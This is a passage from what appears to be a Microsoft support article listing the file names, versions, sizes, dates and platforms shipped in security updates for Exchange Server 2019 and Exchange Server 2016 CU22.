21:06| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.922.19| 46,456| 3-Nov-21| 21:13| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.922.19| 46,456| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.922.19| 28,048| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.922.19| 457,080| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.922.19| 18,312| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.922.19| 30,608| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.dll| 15.2.922.19| 4,187,016| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.922.19| 182,152| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.922.19| 121,736| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.922.19| 403,848| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.922.19| 14,736| 3-Nov-21| 21:06| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.922.19| 89,976| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.922.19| 88,976| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.922.19| 68,480| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.922.19| 63,376| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.922.19| 430,472| 3-Nov-21| 22:36| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.922.19| 122,232| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.922.19| 17,800| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.922.19| 29,048| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.922.19| 60,816| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.922.19| 50,040| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.922.19| 33,160| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.922.19| 113,016| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.922.19| 18,312| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.922.19| 52,088| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.922.19| 675,208| 3-Nov-21| 21:05| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.922.19| 23,944| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.922.19| 17,800| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.922.19| 487,304| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.922.19| 306,056| 3-Nov-21| 21:13| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.922.19| 15,736| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.922.19| 46,472| 3-Nov-21| 21:12| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.922.19| 1,044,360| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.922.19| 15,224| 3-Nov-21| 19:25| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.922.19| 18,832| 3-Nov-21| 19:30| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.922.19| 18,808| 3-Nov-21| 21:14| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.922.19| 118,664| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.922.19| 925,072| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.922.19| 1,469,840| 3-Nov-21| 21:10| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.922.19| 32,656| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.922.19| 41,872| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.922.19| 24,976| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.922.19| 15,224| 3-Nov-21| 21:05| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.922.19| 83,336| 3-Nov-21| 21:38| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.922.19| 50,064| 3-Nov-21| 21:41| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.922.19| 658,824| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.922.19| 186,256| 3-Nov-21| 19:24| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.922.19| 67,464| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:22| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.922.19| 56,720| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.922.19| 28,024| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.922.19| 120,720| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.922.19| 31,632| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.922.19| 57,232| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.922.19| 35,728| 3-Nov-21| 19:22| x86 \nMicrosoft.exchange.webservices.dll| 15.2.922.19| 1,054,096| 3-Nov-21| 19:24| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.922.19| 67,960| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.922.19| 23,440| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.922.19| 77,192| 3-Nov-21| 19:38| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.922.19| 17,288| 3-Nov-21| 19:26| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.922.19| 29,072| 3-Nov-21| 19:25| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.922.19| 505,224| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.922.19| 14,736| 3-Nov-21| 19:24| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.922.19| 36,752| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.922.19| 66,424| 3-Nov-21| 21:04| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.922.19| 19,344| 3-Nov-21| 19:22| x86 \nMicrosoft.filtering.dll| 15.2.922.19| 113,016| 3-Nov-21| 21:05| x86 \nMicrosoft.filtering.exchange.dll| 15.2.922.19| 57,224| 3-Nov-21| 21:04| x86 \nMicrosoft.filtering.interop.dll| 15.2.922.19| 15,240| 3-Nov-21| 21:04| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.922.19| 46,984| 3-Nov-21| 21:06| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.922.19| 15,736| 3-Nov-21| 19:25| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.922.19| 23,952| 3-Nov-21| 19:39| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.922.19| 22,416| 3-Nov-21| 19:22| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.922.19| 34,696| 3-Nov-21| 19:38| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,926| 3-Nov-21| 21:55| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,302| 3-Nov-21| 21:55| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.922.19| 1,517,944| 3-Nov-21| 22:39| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.922.19| 13,192| 3-Nov-21| 19:38| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.922.19| 33,160| 3-Nov-21| 22:17| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.922.19| 18,312| 3-Nov-21| 19:24| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.922.19| 46,464| 3-Nov-21| 21:04| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.922.19| 50,576| 3-Nov-21| 21:04| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.922.19| 72,584| 3-Nov-21| 21:06| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.922.19| 541,560| 3-Nov-21| 19:38| x86 \nMicrosoft.managementgui.dll| 15.2.922.19| 133,512| 3-Nov-21| 19:24| x86 \nMicrosoft.mce.interop.dll| 15.2.922.19| 24,464| 3-Nov-21| 19:22| x86 \nMicrosoft.office.audit.dll| 15.2.922.19| 124,808| 3-Nov-21| 19:24| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.922.19| 593,280| 3-Nov-21| 21:04| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.922.19| 42,376| 3-Nov-21| 21:05| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.922.19| 218,000| 4-Nov-21| 0:10| x86 \nMicrosoft.office.compliance.console.dll| 15.2.922.19| 854,904| 4-Nov-21| 0:10| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.922.19| 485,768| 4-Nov-21| 0:10| x86 \nMicrosoft.office.compliance.core.dll| 15.2.922.19| 413,048| 3-Nov-21| 21:04| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.922.19| 36,240| 3-Nov-21| 21:04| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.922.19| 85,368| 3-Nov-21| 21:05| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.922.19| 1,783,184| 3-Nov-21| 19:38| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.922.19| 49,528| 3-Nov-21| 21:05| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.922.19| 27,512| 3-Nov-21| 21:05| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.922.19| 174,984| 3-Nov-21| 21:04| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.922.19| 166,280| 3-Nov-21| 21:04| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.922.19| 40,336| 3-Nov-21| 19:24| x86 \nMicrosoft.online.box.shell.dll| 15.2.922.19| 46,456| 3-Nov-21| 19:30| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.922.19| 67,968| 3-Nov-21| 19:24| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.922.19| 67,968| 3-Nov-21| 19:24| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.922.19| 120,208| 3-Nov-21| 21:04| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,122| 3-Nov-21| 19:38| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,064| 3-Nov-21| 19:38| Not applicable \nMovemailbox.ps1| Not applicable| 61,140| 3-Nov-21| 19:38| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,602| 3-Nov-21| 19:38| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,532| 3-Nov-21| 19:38| Not applicable \nMpgearparser.dll| 15.2.922.19| 99,728| 3-Nov-21| 19:26| x64 \nMsclassificationadapter.dll| 15.2.922.19| 248,720| 3-Nov-21| 19:38| x64 \nMsexchangecompliance.exe| 15.2.922.19| 78,736| 3-Nov-21| 21:25| x86 \nMsexchangedagmgmt.exe| 15.2.922.19| 25,480| 3-Nov-21| 21:10| x86 \nMsexchangedelivery.exe| 15.2.922.19| 38,800| 3-Nov-21| 21:10| x86 \nMsexchangefrontendtransport.exe| 15.2.922.19| 31,632| 3-Nov-21| 21:06| x86 \nMsexchangehmhost.exe| 15.2.922.19| 27,008| 3-Nov-21| 22:38| x86 \nMsexchangehmrecovery.exe| 15.2.922.19| 29,576| 3-Nov-21| 21:04| x86 \nMsexchangemailboxassistants.exe| 15.2.922.19| 72,584| 3-Nov-21| 21:10| x86 \nMsexchangemailboxreplication.exe| 15.2.922.19| 20,856| 3-Nov-21| 21:17| x86 \nMsexchangemigrationworkflow.exe| 15.2.922.19| 68,984| 3-Nov-21| 21:22| x86 \nMsexchangerepl.exe| 15.2.922.19| 72,072| 3-Nov-21| 21:10| x86 \nMsexchangesubmission.exe| 15.2.922.19| 123,280| 3-Nov-21| 21:16| x86 \nMsexchangethrottling.exe| 15.2.922.19| 39,816| 3-Nov-21| 21:06| x86 \nMsexchangetransport.exe| 15.2.922.19| 74,104| 3-Nov-21| 21:05| x86 \nMsexchangetransportlogsearch.exe| 15.2.922.19| 139,128| 3-Nov-21| 21:10| x86 \nMsexchangewatchdog.exe| 15.2.922.19| 55,672| 3-Nov-21| 19:26| x64 \nMspatchlinterop.dll| 15.2.922.19| 53,632| 3-Nov-21| 21:06| x64 \nNativehttpproxy.dll| 15.2.922.19| 91,528| 3-Nov-21| 21:04| x64 \nNavigatorparser.dll| 15.2.922.19| 636,800| 3-Nov-21| 19:27| x64 \nNego2nativeinterface.dll| 15.2.922.19| 19,344| 3-Nov-21| 19:38| x64 \nNegotiateclientcertificatemodule.dll| 15.2.922.19| 30,096| 3-Nov-21| 19:22| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,764| 3-Nov-21| 19:38| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,579| 3-Nov-21| 19:38| Not applicable \nNtspxgen.dll| 15.2.922.19| 80,760| 3-Nov-21| 19:38| x64 \nOleconverter.exe| 15.2.922.19| 173,968| 3-Nov-21| 19:26| x64 \nOutsideinmodule.dll| 15.2.922.19| 87,928| 3-Nov-21| 19:24| x64 \nOwaauth.dll| 15.2.922.19| 92,040| 3-Nov-21| 19:39| x64 \nPerf_common_extrace.dll| 15.2.922.19| 245,128| 3-Nov-21| 19:25| x64 \nPerf_exchmem.dll| 15.2.922.19| 86,416| 3-Nov-21| 19:27| x64 \nPipeline2.dll| 15.2.922.19| 1,454,480| 3-Nov-21| 21:05| x64 \nPreparemoverequesthosting.ps1| Not applicable| 70,995| 3-Nov-21| 19:38| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,229| 3-Nov-21| 19:38| Not applicable \nProductinfo.managed.dll| 15.2.922.19| 27,000| 3-Nov-21| 19:25| x86 \nProxybinclientsstringsdll| 15.2.922.19| 924,560| 3-Nov-21| 19:30| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,238| 3-Nov-21| 19:38| Not applicable \nQuietexe.exe| 15.2.922.19| 14,712| 3-Nov-21| 19:24| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,524| 3-Nov-21| 19:38| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,655| 3-Nov-21| 21:50| Not applicable \nRemoteexchange.ps1| Not applicable| 23,553| 3-Nov-21| 21:55| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,684| 3-Nov-21| 19:38| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 15,002| 3-Nov-21| 19:38| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,012| 3-Nov-21| 19:38| Not applicable \nReplaycrimsonmsg.dll| 15.2.922.19| 1,104,760| 3-Nov-21| 19:25| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,488| 3-Nov-21| 21:50| Not applicable \nResetcasservice.ps1| Not applicable| 21,707| 3-Nov-21| 19:38| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,101| 3-Nov-21| 19:24| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,161| 3-Nov-21| 19:38| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,210| 3-Nov-21| 19:38| Not applicable \nRightsmanagementwrapper.dll| 15.2.922.19| 86,392| 3-Nov-21| 19:38| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,810| 3-Nov-21| 19:38| Not applicable \nRpcperf.dll| 15.2.922.19| 23,416| 3-Nov-21| 19:25| x64 \nRpcproxyshim.dll| 15.2.922.19| 39,288| 3-Nov-21| 21:05| x64 \nRulesauditmsg.dll| 15.2.922.19| 12,688| 3-Nov-21| 19:24| x64 \nSafehtmlnativewrapper.dll| 15.2.922.19| 34,696| 3-Nov-21| 21:06| x64 \nScanenginetest.exe| 15.2.922.19| 956,304| 3-Nov-21| 19:38| x64 \nScanningprocess.exe| 15.2.922.19| 738,696| 3-Nov-21| 21:05| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,812| 3-Nov-21| 19:38| Not applicable \nServicecontrol.ps1| Not applicable| 52,309| 3-Nov-21| 19:38| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,754| 3-Nov-21| 19:38| Not applicable \nSettingsadapter.dll| 15.2.922.19| 116,104| 3-Nov-21| 19:38| x64 \nSetup.exe| 15.2.922.19| 20,368| 3-Nov-21| 21:04| x86 \nSetupui.exe| 15.2.922.19| 188,280| 3-Nov-21| 21:46| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,189| 3-Nov-21| 19:38| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,867| 3-Nov-21| 19:38| Not applicable \nStatisticsutil.dll| 15.2.922.19| 142,200| 3-Nov-21| 19:38| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,153| 3-Nov-21| 19:38| Not applicable \nStoretsconstants.ps1| Not applicable| 15,830| 3-Nov-21| 21:04| Not applicable \nStoretslibrary.ps1| Not applicable| 28,003| 3-Nov-21| 21:04| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.922.19| 28,536| 3-Nov-21| 19:25| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,927| 3-Nov-21| 19:38| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,973| 3-Nov-21| 19:38| Not applicable \nTextconversionmodule.dll| 15.2.922.19| 86,392| 3-Nov-21| 19:25| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,727| 3-Nov-21| 21:04| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,433| 3-Nov-21| 21:04| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,029| 3-Nov-21| 21:05| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,453| 3-Nov-21| 19:24| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| Not applicable| 14,030| 3-Nov-21| 19:38| Not applicable \nUpdatecas.ps1| Not applicable| 38,213| 3-Nov-21| 19:38| Not applicable \nUpdateconfigfiles.ps1| Not applicable| 19,726| 3-Nov-21| 19:38| Not applicable \nUpdateserver.exe| 15.2.922.19| 3,014,536| 3-Nov-21| 19:39| x64 \nUpdate_malwarefilteringserver.ps1| Not applicable| 18,156| 3-Nov-21| 19:38| Not applicable \nWeb.config_053c31bdd6824e95b35d61b0a5e7b62d| Not applicable| 32,046| 3-Nov-21| 23:31| Not applicable \nWsbexchange.exe| 15.2.922.19| 125,328| 3-Nov-21| 21:06| x64 \nX400prox.dll| 15.2.922.19| 103,312| 3-Nov-21| 19:39| x64 \n_search.lingoperators.a| 15.2.922.19| 34,696| 3-Nov-21| 21:05| Not applicable \n_search.lingoperators.b| 15.2.922.19| 34,696| 3-Nov-21| 21:05| Not applicable \n_search.mailboxoperators.a| 15.2.922.19| 290,168| 3-Nov-21| 21:12| Not applicable \n_search.mailboxoperators.b| 15.2.922.19| 290,168| 3-Nov-21| 21:12| Not applicable \n_search.operatorschema.a| 15.2.922.19| 485,752| 3-Nov-21| 21:05| Not applicable \n_search.operatorschema.b| 15.2.922.19| 485,752| 3-Nov-21| 21:05| Not applicable \n_search.tokenoperators.a| 15.2.922.19| 113,544| 3-Nov-21| 21:04| Not applicable \n_search.tokenoperators.b| 15.2.922.19| 113,544| 3-Nov-21| 21:04| Not applicable \n_search.transportoperators.a| 15.2.922.19| 67,976| 3-Nov-21| 21:18| Not applicable \n_search.transportoperators.b| 15.2.922.19| 67,976| 3-Nov-21| 21:18| Not applicable \n \n### \n\n__\n\nMicrosoft Exchange Server 2016 Cumulative Update 22 Security Update 2\n\nFile name| File version| File size| Date| Time| Platform \n---|---|---|---|---|--- \nActivemonitoringeventmsg.dll| 15.1.2375.17| 71,056| 3-Nov-21| 18:19| x64 \nActivemonitoringexecutionlibrary.ps1| Not applicable| 29,518| 3-Nov-21| 18:09| Not applicable \nAdduserstopfrecursive.ps1| Not applicable| 14,941| 3-Nov-21| 18:09| Not applicable \nAdemodule.dll| 15.1.2375.17| 106,376| 3-Nov-21| 18:19| x64 \nAirfilter.dll| 15.1.2375.17| 42,872| 3-Nov-21| 18:36| x64 \nAjaxcontroltoolkit.dll| 15.1.2375.17| 92,560| 3-Nov-21| 18:23| x86 \nAntispamcommon.ps1| Not applicable| 13,501| 3-Nov-21| 18:12| Not applicable \nAsdat.msi| Not applicable| 5,087,232| 3-Nov-21| 18:19| Not applicable \nAsentirs.msi| Not applicable| 77,824| 3-Nov-21| 18:36| Not applicable \nAsentsig.msi| Not applicable| 73,728| 3-Nov-21| 18:19| Not applicable \nBigfunnel.bondtypes.dll| 15.1.2375.17| 43,896| 3-Nov-21| 18:21| x86 \nBigfunnel.common.dll| 15.1.2375.17| 63,880| 3-Nov-21| 18:10| x86 \nBigfunnel.configuration.dll| 15.1.2375.17| 99,208| 3-Nov-21| 18:36| x86 \nBigfunnel.entropy.dll| 15.1.2375.17| 44,408| 3-Nov-21| 18:19| x86 \nBigfunnel.filter.dll| 15.1.2375.17| 54,136| 3-Nov-21| 18:21| x86 \nBigfunnel.indexstream.dll| 15.1.2375.17| 54,152| 3-Nov-21| 18:22| x86 \nBigfunnel.poi.dll| 15.1.2375.17| 202,640| 3-Nov-21| 18:19| x86 \nBigfunnel.postinglist.dll| 15.1.2375.17| 122,248| 3-Nov-21| 18:23| x86 \nBigfunnel.query.dll| 15.1.2375.17| 99,704| 3-Nov-21| 18:12| x86 \nBigfunnel.ranking.dll| 15.1.2375.17| 79,224| 3-Nov-21| 18:27| x86 \nBigfunnel.syntheticdatalib.dll| 15.1.2375.17| 3,634,576| 3-Nov-21| 18:23| x86 \nBigfunnel.wordbreakers.dll| 15.1.2375.17| 46,472| 3-Nov-21| 18:22| x86 \nCafe_airfilter_dll| 15.1.2375.17| 42,872| 3-Nov-21| 18:36| x64 \nCafe_exppw_dll| 15.1.2375.17| 83,320| 3-Nov-21| 18:12| x64 \nCafe_owaauth_dll| 15.1.2375.17| 92,024| 3-Nov-21| 18:19| x64 \nCalcalculation.ps1| Not applicable| 42,089| 3-Nov-21| 18:09| Not applicable \nCheckdatabaseredundancy.ps1| Not applicable| 94,638| 3-Nov-21| 18:21| Not applicable \nChksgfiles.dll| 15.1.2375.17| 57,232| 3-Nov-21| 18:25| x64 \nCitsconstants.ps1| Not applicable| 15,837| 3-Nov-21| 18:39| Not applicable \nCitslibrary.ps1| Not applicable| 82,696| 3-Nov-21| 18:39| Not applicable \nCitstypes.ps1| Not applicable| 14,476| 3-Nov-21| 18:39| Not applicable \nClassificationengine_mce| 15.1.2375.17| 1,693,064| 3-Nov-21| 18:28| Not applicable \nClusmsg.dll| 15.1.2375.17| 134,032| 3-Nov-21| 18:19| x64 \nCoconet.dll| 15.1.2375.17| 48,008| 3-Nov-21| 18:28| x64 \nCollectovermetrics.ps1| Not applicable| 81,676| 3-Nov-21| 18:21| Not applicable \nCollectreplicationmetrics.ps1| Not applicable| 41,902| 3-Nov-21| 18:21| Not applicable \nCommonconnectfunctions.ps1| Not applicable| 29,943| 3-Nov-21| 20:45| Not applicable \nComplianceauditservice.exe| 15.1.2375.17| 39,816| 3-Nov-21| 20:48| x86 \nConfigureadam.ps1| Not applicable| 22,776| 3-Nov-21| 18:09| Not applicable \nConfigurecaferesponseheaders.ps1| Not applicable| 20,320| 3-Nov-21| 18:09| Not applicable \nConfigurenetworkprotocolparameters.ps1| Not applicable| 19,782| 3-Nov-21| 18:09| Not applicable \nConfiguresmbipsec.ps1| Not applicable| 39,840| 3-Nov-21| 18:09| Not applicable \nConfigure_enterprisepartnerapplication.ps1| Not applicable| 22,295| 3-Nov-21| 18:09| Not applicable \nConnectfunctions.ps1| Not applicable| 37,157| 3-Nov-21| 20:45| Not applicable \nConnect_exchangeserver_help.xml| Not applicable| 30,432| 3-Nov-21| 20:45| Not applicable \nConsoleinitialize.ps1| Not applicable| 24,244| 3-Nov-21| 20:36| Not applicable \nConvertoabvdir.ps1| Not applicable| 20,065| 3-Nov-21| 18:09| Not applicable \nConverttomessagelatency.ps1| Not applicable| 14,536| 3-Nov-21| 18:09| Not applicable \nConvert_distributiongrouptounifiedgroup.ps1| Not applicable| 34,773| 3-Nov-21| 18:09| Not applicable \nCreate_publicfoldermailboxesformigration.ps1| Not applicable| 27,924| 3-Nov-21| 18:09| Not applicable \nCts.14.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 3-Nov-21| 18:08| Not applicable \nCts.14.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.14.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.14.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.14.4.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.15.0.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.15.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.15.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.15.20.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 3-Nov-21| 18:08| Not applicable \nCts.8.1.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts.8.2.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 511| 3-Nov-21| 18:08| Not applicable \nCts.8.3.microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts_exsmime.dll| 15.1.2375.17| 380,816| 3-Nov-21| 18:26| x64 \nCts_microsoft.exchange.data.common.dll| 15.1.2375.17| 1,686,400| 3-Nov-21| 18:19| x86 \nCts_microsoft.exchange.data.common.versionpolicy.cfg| Not applicable| 514| 3-Nov-21| 18:12| Not applicable \nCts_policy.14.0.microsoft.exchange.data.common.dll| 15.1.2375.14| 13,176| 3-Nov-21| 18:09| x86 \nCts_policy.14.1.microsoft.exchange.data.common.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:12| x86 \nCts_policy.14.2.microsoft.exchange.data.common.dll| 15.1.2375.17| 13,200| 3-Nov-21| 18:19| x86 \nCts_policy.14.3.microsoft.exchange.data.common.dll| 15.1.2375.17| 13,184| 3-Nov-21| 18:19| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2375.17| 13,192| 3-Nov-21| 18:29| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2375.17| 13,192| 3-Nov-21| 18:29| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2375.17| 13,176| 3-Nov-21| 18:12| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2375.17| 13,192| 3-Nov-21| 18:19| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2375.14| 13,176| 3-Nov-21| 18:09| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2375.17| 12,680| 3-Nov-21| 18:29| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2375.17| 12,664| 3-Nov-21| 18:19| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2375.14| 12,680| 3-Nov-21| 18:09| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2375.17| 12,688| 3-Nov-21| 18:19| x86 \nDagcommonlibrary.ps1| Not applicable| 60,258| 3-Nov-21| 18:21| Not applicable \nDependentassemblygenerator.exe| 15.1.2375.17| 22,408| 3-Nov-21| 18:29| x86 \nDiaghelper.dll| 15.1.2375.17| 66,960| 3-Nov-21| 18:19| x86 \nDiagnosticscriptcommonlibrary.ps1| Not 